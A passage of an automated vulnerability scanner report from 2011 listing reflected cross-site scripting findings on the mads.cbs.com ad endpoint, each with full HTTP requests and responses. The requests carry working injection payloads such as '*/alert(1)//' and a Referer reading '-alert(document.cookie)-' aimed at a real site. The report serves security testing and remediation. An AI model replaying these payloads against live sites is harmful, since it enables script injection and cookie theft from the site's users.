GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js35ae0<a>44ed3893763&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CBS_ADV_VAL=b; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:33:34 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-15
Expires: Sun, 06 Feb 2011 20:33:34 GMT
Content-Length: 543

<!-- MAC ad --><!-- NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js35ae0<a>44ed3893763&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" -
...[SNIP]...

1.130. http://mads.cbs.com/mac-ad [DVAR_GENRE parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mads.cbs.com
Path:   /mac-ad

Issue detail

The value of the DVAR_GENRE request parameter is copied into a JavaScript inline comment. The payload 4b426*/alert(1)//1050a777b41 was submitted in the DVAR_GENRE parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy4b426*/alert(1)//1050a777b41&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CBS_ADV_VAL=b; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:35:17 GMT
Server: Apache/2.2
Content-Length: 1189
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Sun, 06 Feb 2011 20:35:17 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy4b426*/alert(1)//1050a777b41&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('<!-- default ad -->
...[SNIP]...

1.131. http://mads.cbs.com/mac-ad [DVAR_GENRE parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.cbs.com
Path:   /mac-ad

Issue detail

The value of the DVAR_GENRE request parameter is copied into the HTML document as plain text between tags. The payload 6377c<a>3fffe363d11 was submitted in the DVAR_GENRE parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy6377c<a>3fffe363d11&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=11797704&ADREQ&SP=119&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CBS_ADV_VAL=b; MADTEST=1; __utmz=235293011.1297024404.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/34; __utma=235293011.256726451.1297024404.1297024404.1297024404.1; __utmc=235293011; __utmb=235293011.1.10.1297024404

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:36:35 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-15
Expires: Sun, 06 Feb 2011 20:36:35 GMT
Content-Length: 601

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy6377c<a>3fffe363d11&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=11797704&ADREQ&SP=119&POS=100&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP ( _MAPPINGS='CBS' BRAND='57' SITE='164'
...[SNIP]...

1.132. http://mads.cbs.com/mac-ad [DVAR_INSTLANG parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mads.cbs.com
Path:   /mac-ad

Issue detail

The value of the DVAR_INSTLANG request parameter is copied into a JavaScript inline comment. The payload 95bb9*/alert(1)//5a7288748bb was submitted in the DVAR_INSTLANG parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US95bb9*/alert(1)//5a7288748bb&x-cb=81503859&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CBS_ADV_VAL=b; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:36:05 GMT
Server: Apache/2.2
Content-Length: 1189
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Sun, 06 Feb 2011 20:36:05 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US95bb9*/alert(1)//5a7288748bb&x-cb=81503859&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('<!-- default ad -->
...[SNIP]...

1.133. http://mads.cbs.com/mac-ad [DVAR_INSTLANG parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.cbs.com
Path:   /mac-ad

Issue detail

The value of the DVAR_INSTLANG request parameter is copied into the HTML document as plain text between tags. The payload 45b84<a>3f59d2a0e54 was submitted in the DVAR_INSTLANG parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US45b84<a>3f59d2a0e54&x-cb=11797704&ADREQ&SP=119&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CBS_ADV_VAL=b; MADTEST=1; __utmz=235293011.1297024404.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/34; __utma=235293011.256726451.1297024404.1297024404.1297024404.1; __utmc=235293011; __utmb=235293011.1.10.1297024404

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:38:09 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-15
Expires: Sun, 06 Feb 2011 20:38:09 GMT
Content-Length: 602

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US45b84<a>3f59d2a0e54&x-cb=11797704&ADREQ&SP=119&POS=100&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP ( _MAPPINGS='CBS' BRAND='57' SITE='164' SP='119' CNET-PTYPE='6711' POS='100' NCAT='19650:19806:' CNET-PA
...[SNIP]...

1.134. http://mads.cbs.com/mac-ad [DVAR_SESSION parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mads.cbs.com
Path:   /mac-ad

Issue detail

The value of the DVAR_SESSION request parameter is copied into a JavaScript inline comment. The payload 60d21*/alert(1)//3098f5412a was submitted in the DVAR_SESSION parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b60d21*/alert(1)//3098f5412a&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CBS_ADV_VAL=b; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:35:05 GMT
Server: Apache/2.2
Content-Length: 1187
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Sun, 06 Feb 2011 20:35:05 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b60d21*/alert(1)//3098f5412a&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('<!-- default ad -->
...[SNIP]...

1.135. http://mads.cbs.com/mac-ad [DVAR_SESSION parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.cbs.com
Path:   /mac-ad

Issue detail

The value of the DVAR_SESSION request parameter is copied into the HTML document as plain text between tags. The payload 1aacb<a>a9e8aafda38 was submitted in the DVAR_SESSION parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b1aacb<a>a9e8aafda38&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=11797704&ADREQ&SP=119&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CBS_ADV_VAL=b; MADTEST=1; __utmz=235293011.1297024404.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/34; __utma=235293011.256726451.1297024404.1297024404.1297024404.1; __utmc=235293011; __utmb=235293011.1.10.1297024404

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:36:06 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-15
Expires: Sun, 06 Feb 2011 20:36:06 GMT
Content-Length: 601

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b1aacb<a>a9e8aafda38&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=11797704&ADREQ&SP=119&POS=100&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP ( _MAPPINGS='CBS' BRA
...[SNIP]...

1.136. http://mads.cbs.com/mac-ad [GLOBAL&CLIENT:ID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mads.cbs.com
Path:   /mac-ad

Issue detail

The value of the GLOBAL&CLIENT:ID request parameter is copied into a JavaScript inline comment. The payload 963a9*/alert(1)//e7e2702a46 was submitted in the GLOBAL&CLIENT:ID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS963a9*/alert(1)//e7e2702a46&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CBS_ADV_VAL=b; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:33:33 GMT
Server: Apache/2.2
Content-Length: 1145
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Sun, 06 Feb 2011 20:33:33 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS963a9*/alert(1)//e7e2702a46&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NU
...[SNIP]...

1.137. http://mads.cbs.com/mac-ad [GLOBAL&CLIENT:ID parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.cbs.com
Path:   /mac-ad

Issue detail

The value of the GLOBAL&CLIENT:ID request parameter is copied into the HTML document as plain text between tags. The payload 8321f<a>c1fffffa83 was submitted in the GLOBAL&CLIENT:ID parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS8321f<a>c1fffffa83&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=11797704&ADREQ&SP=119&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CBS_ADV_VAL=b; MADTEST=1; __utmz=235293011.1297024404.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/34; __utma=235293011.256726451.1297024404.1297024404.1297024404.1; __utmc=235293011; __utmb=235293011.1.10.1297024404

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:33:35 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-15
Expires: Sun, 06 Feb 2011 20:33:35 GMT
Content-Length: 600

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS8321f<a>c1fffffa83&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=11797704&ADREQ&SP=119&POS=100&cookiesOn=1" _REQ_N
...[SNIP]...

1.138. http://mads.cbs.com/mac-ad [NCAT parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.cbs.com
Path:   /mac-ad

Issue detail

The value of the NCAT request parameter is copied into the HTML document as plain text between tags. The payload 2dc21<a>6048630f020 was submitted in the NCAT parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A2dc21<a>6048630f020&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=11797704&ADREQ&SP=119&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CBS_ADV_VAL=b; MADTEST=1; __utmz=235293011.1297024404.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/34; __utma=235293011.256726451.1297024404.1297024404.1297024404.1; __utmc=235293011; __utmb=235293011.1.10.1297024404

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:36:59 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-15
Expires: Sun, 06 Feb 2011 20:36:59 GMT
Content-Length: 619

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A2dc21<a>6048630f020&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=11797704&ADREQ&SP=119&POS=100&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP ( _MAPPINGS='CBS' BRAND='57' SITE='164' SP='119' CNET-PTYPE='
...[SNIP]...

1.139. http://mads.cbs.com/mac-ad [NCAT parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mads.cbs.com
Path:   /mac-ad

Issue detail

The value of the NCAT request parameter is copied into a JavaScript inline comment. The payload cce01*/alert(1)//1575e9d6777 was submitted in the NCAT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3Acce01*/alert(1)//1575e9d6777&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CBS_ADV_VAL=b; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:35:31 GMT
Server: Apache/2.2
Content-Length: 1194
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Sun, 06 Feb 2011 20:35:31 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3Acce01*/alert(1)//1575e9d6777&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('<!-- default ad -->
...[SNIP]...

1.140. http://mads.cbs.com/mac-ad [NODE parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mads.cbs.com
Path:   /mac-ad

Issue detail

The value of the NODE request parameter is copied into a JavaScript inline comment. The payload 901dd*/alert(1)//13d918e3a50 was submitted in the NODE parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806901dd*/alert(1)//13d918e3a50&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CBS_ADV_VAL=b; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:35:45 GMT
Server: Apache/2.2
Content-Length: 1172
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Sun, 06 Feb 2011 20:35:45 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806901dd*/alert(1)//13d918e3a50&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('<!-- default ad -->
...[SNIP]...

1.141. http://mads.cbs.com/mac-ad [NODE parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.cbs.com
Path:   /mac-ad

Issue detail

The value of the NODE request parameter is copied into the HTML document as plain text between tags. The payload e0b42<a>621aa8019b1 was submitted in the NODE parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806e0b42<a>621aa8019b1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=11797704&ADREQ&SP=119&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1
Accept: */*
